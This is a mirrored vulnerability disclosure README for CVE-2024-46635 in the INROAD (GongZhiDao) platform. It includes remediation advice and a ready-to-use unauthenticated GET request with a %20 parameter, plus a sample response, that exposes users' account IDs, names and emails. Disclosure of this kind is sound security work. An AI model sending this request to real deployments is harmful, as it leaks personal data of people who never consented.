Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-46635 PoC — INROAD 安全漏洞

Source
https://github.com/h1thub/CVE-2024-46635
Associated Vulnerability
Title:INROAD 安全漏洞 (CVE-2024-46635)
Description:INROAD是中国异工同智(INROAD)公司的一个数字工业化应用程序。 INROAD v202402060之前版本存在安全漏洞。攻击者利用该漏洞通过向UserNameOrPhoneNumber参数发送特制的有效载荷来访问敏感信息。
Readme
# CVE-2024-46635

## Background

The GongZhiDao System (工智道系统) is a platform developed by [GongZhiDao](https://www.in-road.com/). It provides enterprise solutions including user management, data analysis, and operational functionalities. However, a security vulnerability was discovered in one of the API endpoints that could potentially lead to the exposure of sensitive user information without proper authorization.

## Vulnerability Description

A vulnerability exists in the `/oaa/api/AccountMaster/GetCurrentUserInfo` API endpoint of the GongZhiDao System. By passing `%20` (a URL-encoded space) in place of the `UserNameOrPhoneNumber` parameter, the API responds with sensitive user information, including account ID, username, and email address, even without proper authentication or authorization. This improper input validation allows attackers to gain unauthorized access to sensitive data.

## Impact

Successful exploitation of this vulnerability could lead to the exposure of sensitive user data, including:

- Account ID
- Username
- Email address
- Phone number (if present)
- Other personal information

An attacker could use this information to carry out further attacks, such as identity theft or phishing.

## Attack Vector

To exploit the vulnerability, an attacker must send a crafted HTTP GET request to the vulnerable API endpoint:

```http
GET /oaa/api/AccountMaster/GetCurrentUserInfo?UserNameOrPhoneNumber=%20 HTTP/2
```

This request returns a 200 OK response with sensitive user data in JSON format:

```http
HTTP/2 200 OK
Date: Tue, 10 Sep 2024 03:25:09 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 153
Server: nginx/1.22.0
X-Powered-By: ASP.NET
Set-Cookie: Path=/; HttpOnly; Secure

{"accountId":"09c05434-e1ff-4436-b1b0-01215e48b274","name":"李三","phoneNumber":null,"userName":"19999999999","email1":"test@yourdomain.com"}
```


## Technical Details

- **Affected Endpoint**: `/oaa/api/AccountMaster/GetCurrentUserInfo`
- **Method**: HTTP GET
- **Parameters**: `UserNameOrPhoneNumber` with `%20` as the input
- **Response**: The API returns sensitive user data in JSON format without proper input validation or authorization.
- **Vulnerability Type**: Improper Input Validation / Sensitive Information Disclosure

## Remediation Recommendations

1. **Implement proper input validation**: Ensure that the `UserNameOrPhoneNumber` parameter is properly sanitized and validated. Inputs such as `%20` should be rejected.

2. **Authorization checks**: Implement proper authorization mechanisms to ensure that only authenticated and authorized users can access sensitive information.

3. **Rate limiting and monitoring**: Apply rate limiting to API endpoints to prevent brute force or automated attacks, and monitor API activity for abnormal access patterns.

## Credits

This vulnerability was discovered by hithub.

## References

- [GongZhiDao Official Website](https://www.in-road.com/)
- [CWE-20: Improper Input Validation](https://cwe.mitre.org/data/definitions/20.html)
File Snapshot

 [4.0K]  /data/pocs/d03ac2a07396d8ac1058f774946550412062f0f0
└── [3.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.